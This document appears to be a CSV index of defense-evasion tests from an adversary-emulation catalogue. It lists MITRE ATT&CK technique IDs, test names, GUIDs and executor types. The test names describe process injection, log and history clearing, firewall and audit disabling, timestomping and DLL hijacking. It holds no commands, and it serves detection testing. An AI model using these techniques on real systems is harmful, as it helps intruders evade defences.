defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
defense-evasion,T1574.001,Hijack Execution Flow: DLL,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.001,Hijack Execution Flow: DLL,2,Phantom Dll Hijacking - WinAppXRT.dll,46ed938b-c617-429a-88dc-d49b5c9ffedb,command_prompt
defense-evasion,T1574.001,Hijack Execution Flow: DLL,3,Phantom Dll Hijacking - ualapi.dll,5898902d-c5ad-479a-8545-6f5ab3cfc87f,command_prompt
defense-evasion,T1574.001,Hijack Execution Flow: DLL,4,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1574.001,Hijack Execution Flow: DLL,5,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
defense-evasion,T1574.001,Hijack Execution Flow: DLL,6,"DLL Search Order Hijacking,DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE",c095ad8e-4469-4d33-be9d-6f6d1fb21585,powershell
defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,6,SubInAcl Execution,a8568b10-9ab9-4140-a523-1c72e0176924,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,2,Install Additional Authentication Packages,91580da6-bc6e-431b-8b88-ac77180005f2,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,bash
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear Docker Container Logs,553b39f9-1e8c-47b1-abf5-8daf7b0391e9,bash
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Clear PowerShell Session History,22c779cd-9445-4d3e-a136-f75adbf0315f,powershell
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1202,Indirect Command Execution,4,Indirect Command Execution - Scriptrunner.exe,0fd14730-6226-4f5e-8d67-43c65f1be940,powershell
defense-evasion,T1202,Indirect Command Execution,5,Indirect Command Execution - RunMRU Dialog,de323a93-2f18-4bd5-ba60-d6fca6aeff76,powershell
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Base64 decoding with shell utilities (freebsd),b6097712-c42e-4174-b8f2-4b1e1a5bbb3d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,FreeBSD b64encode Shebang in CLI,18ee2002-66e8-4518-87c5-c0ec9c8299ac,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,9,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,10,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
defense-evasion,T1140,Deobfuscate/Decode Files or Information,11,Expand CAB with expand.exe,9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11,command_prompt
defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
defense-evasion,T1562,Impair Defenses,2,Disable journal logging via systemctl utility,c3a377f9-1203-4454-aa35-9d391d34768f,sh
defense-evasion,T1562,Impair Defenses,3,Disable journal logging via sed utility,12e5551c-8d5c-408e-b3e4-63f53b03379f,sh
defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,1,Copy and Delete Mailbox Data on Windows,d29f01ea-ac72-4efc-8a15-bea64b77fabf,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,2,Copy and Delete Mailbox Data on Linux,25e2be0e-96f7-4417-bd16-a4a2500e3802,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,3,Copy and Delete Mailbox Data on macOS,3824130e-a6e4-4528-8091-3a52eeb540f6,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,4,Copy and Modify Mailbox Data on Windows,edddff85-fee0-499d-9501-7d4d2892e79b,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,5,Copy and Modify Mailbox Data on Linux,6d99f93c-da56-49e3-b195-163090ace4f6,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,6,Copy and Modify Mailbox Data on macOS,8a0b1579-5a36-483a-9cde-0236983e1665,bash
defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
defense-evasion,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
defense-evasion,T1055,Process Injection,5,Read-Write-Execute process Injection,0128e48e-8c1a-433a-a11a-a5387384f1e1,powershell
defense-evasion,T1055,Process Injection,6,Process Injection with Go using UuidFromStringA WinAPI,2315ce15-38b6-46ac-a3eb-5e21abef2545,powershell
defense-evasion,T1055,Process Injection,7,Process Injection with Go using EtwpCreateEtwThread WinAPI,7362ecef-6461-402e-8716-7410e1566400,powershell
defense-evasion,T1055,Process Injection,8,Remote Process Injection with Go using RtlCreateUserThread WinAPI,a0c1725f-abcd-40d6-baac-020f3cf94ecd,powershell
defense-evasion,T1055,Process Injection,9,Remote Process Injection with Go using CreateRemoteThread WinAPI,69534efc-d5f5-4550-89e6-12c6457b9edd,powershell
defense-evasion,T1055,Process Injection,10,Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively),2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39,powershell
defense-evasion,T1055,Process Injection,11,Process Injection with Go using CreateThread WinAPI,2871ed59-3837-4a52-9107-99500ebc87cb,powershell
defense-evasion,T1055,Process Injection,12,Process Injection with Go using CreateThread WinAPI (Natively),2a3c7035-d14f-467a-af94-933e49fe6786,powershell
defense-evasion,T1055,Process Injection,13,UUID custom process Injection,0128e48e-8c1a-433a-a11a-a5304734f1e1,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,6,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,9,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,13,LOLBAS CustomShellHost to Spawn Process,b1eeb683-90bb-4365-bbc2-2689015782fe,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,14,Provlaunch.exe Executes Arbitrary Command via Registry Key,ab76e34f-28bf-441f-a39c-8db4835b89cc,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,15,LOLBAS Msedge to Spawn Process,e5eedaed-ad42-4c1e-8783-19529738a349,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,16,System Binary Proxy Execution - Wlrmdr Lolbin,7816c252-b728-4ea6-a683-bd9441ca0b71,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,9,MacOS - Timestomp Date Modified,87fffff4-d371-4057-a539-e3b24c37e564,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,10,Event Log Manipulations- Time slipping via Powershell,7bcf83bf-f5ef-425c-9d9a-71618ad9ed12,powershell
defense-evasion,T1620,Reflective Code Loading,1,WinPwn - Reflectively load Mimik@tz into memory,56b9589c-9170-4682-8c3d-33b86ecb5119,powershell
defense-evasion,T1497.003,Time Based Evasion,1,Delay execution with ping,8b87dd03-8204-478c-bac3-3959f6528de3,sh
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,2,Disable Windows IIS HTTP Logging via PowerShell,a957fb0f-1e85-49b2-a211-413366784b1e,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,3,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,8,Modify Event Log Channel Access Permissions via Registry - PowerShell,8e81d090-0cd6-4d46-863c-eec11311298f,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,9,Modify Event Log Channel Access Permissions via Registry 2 - PowerShell,85e6eff8-3ed4-4e03-ae50-aa6a404898a5,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,10,Modify Event Log Access Permissions via Registry - PowerShell,a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1,powershell
defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start Packet Filter,0ca82ed1-0a94-4774-9a9a-a2c83a8022b7,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Add and delete Packet Filter rules,8b23cae1-66c1-41c5-b79d-e095b6098b5b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,16,Edit UFW firewall main configuration file,7b697ece-8270-46b5-bbc7-6b9e27081831,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,17,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,18,Disable iptables,7784c64e-ed0b-4b65-bf63-c86db229fd56,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,19,Modify/delete iptables firewall rules,899a7fb5-d197-4951-8614-f19ac4a73ad4,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,24,Set a firewall rule using New-NetFirewallRule,94be7646-25f6-467e-af23-585fb13000c8,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,25,ESXi - Set Firewall to PASS Traffic,a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d,command_prompt
defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
defense-evasion,T1562.012,Impair Defenses: Disable or Modify Linux Audit System,1,Delete all auditd rules using auditctl,33a29ab1-cabb-407f-9448-269041bf2856,sh
defense-evasion,T1562.012,Impair Defenses: Disable or Modify Linux Audit System,2,Disable auditd using auditctl,7906f0a6-b527-46ee-9026-6e81a9184e08,sh
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1553.006,Subvert Trust Controls: Code Signing Policy Modification,1,Code Signing Policy Modification,bb6b51e1-ab92-45b5-aeea-e410d06405f8,command_prompt
defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
defense-evasion,T1112,Modify Registry,4,Use Powershell to Modify registry to store logon credentials,68254a85-aa42-4312-a695-38b7276307f8,powershell
defense-evasion,T1112,Modify Registry,5,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
defense-evasion,T1112,Modify Registry,6,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
defense-evasion,T1112,Modify Registry,7,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
defense-evasion,T1112,Modify Registry,9,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
defense-evasion,T1112,Modify Registry,10,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
defense-evasion,T1112,Modify Registry,11,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
defense-evasion,T1112,Modify Registry,12,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
defense-evasion,T1112,Modify Registry,13,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
defense-evasion,T1112,Modify Registry,14,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
defense-evasion,T1112,Modify Registry,15,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
defense-evasion,T1112,Modify Registry,16,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
defense-evasion,T1112,Modify Registry,17,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
defense-evasion,T1112,Modify Registry,18,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
defense-evasion,T1112,Modify Registry,19,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
defense-evasion,T1112,Modify Registry,20,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
defense-evasion,T1112,Modify Registry,21,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
defense-evasion,T1112,Modify Registry,22,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
defense-evasion,T1112,Modify Registry,23,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
defense-evasion,T1112,Modify Registry,24,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
defense-evasion,T1112,Modify Registry,25,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
defense-evasion,T1112,Modify Registry,26,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
defense-evasion,T1112,Modify Registry,27,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
defense-evasion,T1112,Modify Registry,28,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
defense-evasion,T1112,Modify Registry,29,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
defense-evasion,T1112,Modify Registry,30,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
defense-evasion,T1112,Modify Registry,31,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
defense-evasion,T1112,Modify Registry,32,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
